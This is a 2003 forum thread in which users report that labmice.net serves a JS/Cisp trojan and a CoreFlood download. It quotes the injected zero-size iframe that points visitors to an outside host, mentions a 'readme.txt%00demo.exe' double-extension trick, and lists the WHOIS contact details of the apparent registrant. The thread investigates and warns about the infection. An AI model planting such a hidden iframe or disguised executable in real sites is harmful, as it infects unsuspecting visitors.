labmice.net infected by java script virus - ResellerRatings Store Ratings, Shopping, Deals, and Bargains

DVNT1 · 05-19-2003, 02:23 PM

Caution: I went to http://www.labmice.net and immediately got a JS/Cisp trojan/virus warning.

Is it just me or is the site really infected? (I think it's the site)

DVNT1 · 05-19-2003, 02:37 PM

I checked this with two other computers and they show an infection at the Labmice.net site too.

sharder8 · 05-20-2003, 12:36 AM

DVNT1 --

I went first with Opera and nothing.

Second, went with IE and again . . . .

Harder

muno · 05-20-2003, 12:44 AM

Yep, mcafee enterprise7 reports the following:
JS/Cisp ->
Then it tries to execute 'readme.txt%00demo.exe' which I find rather disturbing (using the lame trick of double extensions).
-M

DVNT1 · 05-20-2003, 10:11 AM

Significant part of the reply I received from them:

Quote:

...and we believe it to be a false positive caused by McAfee. We are not receiving this error when running Symantec, Sophos, Trend Micro, or Panda Antivirus, and cannot identify any malicious code in the HTML file that is being referenced.

The source of the issue is an unauthorised tag that is being dynamically generated on our web server that is redirecting some clients to www.beech-info.com, a software reseller that we have no affilation with. We are working with our webhost (Interland) to find the source of this script and eliminate it...

sharder8 · 05-20-2003, 10:32 AM

When I reported nothing found, I should have mentioned that I'm running PC-cillin from Trend!

Harder

muno · 05-20-2003, 11:38 PM

Well mcafee is, at least here, notorious for thinking everything is a virus - which I would've accepted if it was only the javascript - but since it tried to execute something I'm more worried.

I disabled mcafee and entered labmice.net, it downloaded something without prompt (I believe that to be the 'readme.txt%00demo.exe'.
-M

The piece of .exe is detected as CoreFlood Trojan (that is according to nai distributed with js/cisp)
Here is info on the virus
http://vil.nai.com/vil/content/v_100312.htm

And, emphasis on and. My registry has been modified to run an unknown program just like nai website suggests.
The site is virus infected.

aaronjmack · 06-23-2003, 02:01 PM

I called & left email for the website owner and talked to Interland (the host - which they were useless - kept trying to sign me up as if reading from a script).

By viewing the labmice.net source file from their main site, at the very bottom of the page, scrolling far to the right, is this line:

<iframe src=http://www.beech-info.com/inf214.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

Going to the http://www.beech-info.com site obviously doesn't do much good, but is interesting... slightly.

This is the public Whois info on beech-info.com
Beech Info LLC
Woodville, Texas
Registered through Omnistarhost.com
Created on 2-10-03, Updated 6-12-03, Expires 2-10-04
Admin: Paul Hopkins (junior@softhome.net)
(206) 666-4895

Al_Bongo · 11-03-2003, 05:14 AM

We had this same problem on our Interland hosted website. They are crap - this trojan has been around for over 6 months, so they should have protected themselves against it !!